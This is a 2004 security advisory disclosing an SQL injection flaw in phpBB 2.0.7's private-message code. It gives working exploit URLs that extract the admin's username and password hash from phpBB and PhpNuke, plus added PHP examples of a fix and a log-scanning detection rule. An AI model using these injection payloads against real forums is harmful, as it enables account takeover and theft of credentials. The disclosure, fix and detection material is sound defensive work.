Message-ID: <20040326184004.22620.qmail@web21409.mail.yahoo.com>
From: come2waraxe at yahoo.com (Janek Vind)
Subject: [waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.7 and in older versions]


{================================================================================}
{                              [waraxe-2004-SA#013]                              }
{================================================================================}
{                                                                                }
{      [ Critical sql injection bug in PhpBB 2.0.7 and in older versions ]       }
{                                                                                }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 26. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


PhpBB is widely used and very popular forum software, written in PHP.
Homepage:  http://www.phpbb.com/



Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PhpBB 2.0.x is written very carefully and securely. But even there, bugs can
exist which give a potential malicious attacker sensitive information from the
database: the admin's username and the MD5 hash of the admin's password.

So, let's look at the original code from privmsg.php, line 189:


*************************************************************************************

	// SQL to pull appropriate message, prevents nosey people
	// reading other peoples messages ... hopefully!
	//
	switch( $folder )
	{
		case 'inbox':
			$l_box_name = $lang['Inbox'];
			$pm_sql_user = "AND pm.privmsgs_to_userid = " . $userdata['user_id'] . " 
				AND ( pm.privmsgs_type = " . PRIVMSGS_READ_MAIL . " 
					OR pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . " 
					OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " )";
			break;
		case 'outbox':
			$l_box_name = $lang['Outbox'];
			$pm_sql_user = "AND pm.privmsgs_from_userid =  " . $userdata['user_id'] . " 
				AND ( pm.privmsgs_type = " . PRIVMSGS_NEW_MAIL . "
					OR pm.privmsgs_type = " . PRIVMSGS_UNREAD_MAIL . " ) ";
			break;
		case 'sentbox':
			$l_box_name = $lang['Sentbox'];
			$pm_sql_user = "AND pm.privmsgs_from_userid =  " . $userdata['user_id'] . " 
				AND pm.privmsgs_type = " . PRIVMSGS_SENT_MAIL;
			break;
		case 'savebox':
			$l_box_name = $lang['Savebox'];
			// NB: ".=" here, not "=" as in the other cases
			$pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
					AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " ) 
				OR ( pm.privmsgs_from_userid = " . $userdata['user_id'] . "
					AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " ) 
				)";
			break;
		default:
			message_die(GENERAL_ERROR, $lang['No_such_folder']);
			break;
	}

	//
	// Major query obtains the message ...
	//
	$sql = "SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text
		FROM " . PRIVMSGS_TABLE . " pm, " . PRIVMSGS_TEXT_TABLE . " pmt, " . USERS_TABLE . " u, " . USERS_TABLE . " u2 
		WHERE pm.privmsgs_id = $privmsgs_id
			AND pmt.privmsgs_text_id = pm.privmsgs_id 
			$pm_sql_user 
			AND u.user_id = pm.privmsgs_from_userid 
			AND u2.user_id = pm.privmsgs_to_userid";

*****************************************************************************

As we can see, for some reason there is "$pm_sql_user .=" in the 'savebox'
case, and $pm_sql_user is never initialised before the switch, so the clause is
appended to whatever that variable already holds. The funny thing is that this
little bug can open a critical security hole in the forum. First, let's try this:

http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=foobar

and we get this error message:

General Error

Could not query private message post information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_t

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 2 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid

Line : 238
File : D:\apache_wwwroot\phpbb206c\privmsg.php

 
Next, if we request this:

http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/*

then we don't get any error message at all: the UNION now supplies as many
columns as the original SELECT. Now it's time to do something "useful":

********************[real-life sploit]********************


http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*


********************[/real-life sploit]*******************

and we will see the admin's username and the MD5 hash of the admin's password
displayed in plain text ;)
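A corrected version of the 'savebox' clause, as an added example that is not phpBB's own code. Part 1 reproduces the failure mode from the advisory in a self-contained way: extract() over request data does what register_globals does, turning the pm_sql_user request parameter into a PHP variable before the ".=" runs. Part 2 builds the same clause in a function that starts from a known value, assigns with "=" rather than ".=", checks the folder name against a fixed list and interpolates only integers. The values 3 and 4 for PRIVMSGS_SAVED_IN_MAIL and PRIVMSGS_SAVED_OUT_MAIL are the ones visible in the advisory's error output; the helper names (check, pm_folder_clause) and the request array are assumptions made for this example.

```php
<?php
// Added example, not phpBB's code. Part 1 reproduces the bug from the
// advisory without needing register_globals; part 2 shows the corrected
// pattern. Constant values 3 and 4 appear in the advisory's SQL error
// output as SAVED_IN / SAVED_OUT; function and variable names are assumed.
declare(strict_types=1);

define('PRIVMSGS_SAVED_IN_MAIL', 3);
define('PRIVMSGS_SAVED_OUT_MAIL', 4);

function check(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// ---- 1. The bug, reproduced --------------------------------------------------
// extract() over request data does what register_globals did: each request
// parameter becomes a variable of the same name, including names the script
// never expected to receive from the client.
$request = array('folder' => 'savebox', 'p' => '99', 'pm_sql_user' => 'foobar'); // constructed
extract($request);
$user_id = 2;

// Original pattern: ".=" on a variable this code path never initialised, so
// the clause is appended to whatever the request put there.
$pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = $user_id"
    . " AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " )"
    . " OR ( pm.privmsgs_from_userid = $user_id"
    . " AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " ) )";
$vulnerable = $pm_sql_user;
check(strpos($vulnerable, 'foobarAND') === 0, 'injected prefix reaches the SQL');

// ---- 2. The fix ----------------------------------------------------------------
// Build the clause in its own scope, starting from a known value, assigning
// with "=" and interpolating only an integer. The only request-derived input
// is $folder, and it is checked against a fixed list of names.
function pm_folder_clause(string $folder, int $user_id): string
{
    $clause = '';
    switch ($folder) {
        case 'savebox':
            $clause = "AND ( ( pm.privmsgs_to_userid = $user_id"
                . " AND pm.privmsgs_type = " . PRIVMSGS_SAVED_IN_MAIL . " )"
                . " OR ( pm.privmsgs_from_userid = $user_id"
                . " AND pm.privmsgs_type = " . PRIVMSGS_SAVED_OUT_MAIL . " ) )";
            break;
        // inbox, outbox and sentbox follow the same "=" pattern (omitted here)
        default:
            throw new InvalidArgumentException("No such folder: $folder");
    }
    return $clause;
}

$privmsgs_id = (int) $p;          // the p parameter: cast before it meets SQL
$fixed = pm_folder_clause($folder, $user_id);

check(strpos($fixed, 'foobar') === false, 'request data must not reach the clause');
check(strncmp($fixed, 'AND ( (', 7) === 0, 'clause starts where the code says it starts');
check($privmsgs_id === 99, 'message id is an integer');

echo "vulnerable: " . substr($vulnerable, 0, 16) . "...\n";
echo "fixed:      " . substr($fixed, 0, 16) . "...\n";
```

Run it with the PHP CLI; it throws if the fixed clause still carries the injected prefix. The two checks that matter are the folder whitelist and the integer casts: together they leave no path by which request data reaches the SQL string, whether or not register_globals is on.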

And to all PhpNuke 6.x and 7.x users, here is
something for you:

http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
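Detection logic covering both the phpBB and the PhpNuke request shapes above, as an added example that is code from neither project. It scans Apache combined-format log lines for any request whose query string carries a pm_sql_user parameter: that name is an internal variable of privmsg.php that no legitimate client ever sends, so its presence is a high-fidelity indicator on its own, and the check does not need to recognise any particular payload. The log lines, addresses, paths and timestamps are constructed for the example; the function name find_pm_sql_user_requests is an assumption.

```php
<?php
// Added example, not phpBB's or PhpNuke's code. Flags access-log requests that
// carry a "pm_sql_user" query parameter, the marker of the technique in this
// advisory. Log lines below are constructed for the example.
declare(strict_types=1);

// Constructed Apache combined-format lines (addresses, paths, times invented).
$log = <<<'LOG'
10.0.0.5 - - [26/Mar/2004:18:40:04 +0200] "GET /phpbb/privmsg.php?folder=savebox&mode=read&p=99 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.8 - - [26/Mar/2004:18:41:10 +0200] "GET /phpbb/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=foobar HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Mar/2004:18:42:31 +0200] "GET /nuke/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=x HTTP/1.1" 200 3000 "-" "curl/7.10"
10.0.0.5 - - [26/Mar/2004:18:43:00 +0200] "GET /phpbb/viewtopic.php?t=5 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
LOG;

/**
 * Return one entry per request whose query string contains pm_sql_user.
 * Matching is on the parameter *name* after URL decoding: no legitimate
 * client sends it, so the value (probe, payload or junk) is irrelevant.
 */
function find_pm_sql_user_requests(string $log): array
{
    $hits = array();
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // client IP, then the request target from the quoted request line
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) /', $line, $m)) {
            continue;
        }
        $ip = $m[1];
        $target = $m[2];
        $query = parse_url($target, PHP_URL_QUERY);
        if (!is_string($query)) {
            continue;                      // no query string at all
        }
        parse_str($query, $params);        // URL-decodes names and values
        if (array_key_exists('pm_sql_user', $params)) {
            $hits[] = array(
                'ip'     => $ip,
                'script' => parse_url($target, PHP_URL_PATH),
                'value'  => (string) $params['pm_sql_user'],
            );
        }
    }
    return $hits;
}

$hits = find_pm_sql_user_requests($log);
if (count($hits) !== 2) {
    throw new RuntimeException('expected the two probing requests to be flagged');
}
foreach ($hits as $h) {
    printf("%-10s %-25s pm_sql_user=%s\n", $h['ip'], $h['script'], $h['value']);
}
```

The benign savebox request on the first line is not flagged even though its folder and mode match the advisory's URLs exactly; only the extra parameter name trips the rule. The same key check works as a request filter in front of the application until the code is fixed.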



Post Scriptum:

I really enjoy reading the PhpBB 2.x code, because it is written in good style
and is very secure. To all PHP programmers: I recommend reading the file
"docs\codingstandards.htm" from the PhpBB package; it will help you learn good
programming style!




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq readers in Estonia!
Greetings!
Special greets to Stefano from UT Bee Clan!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@...oo.com
    Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------

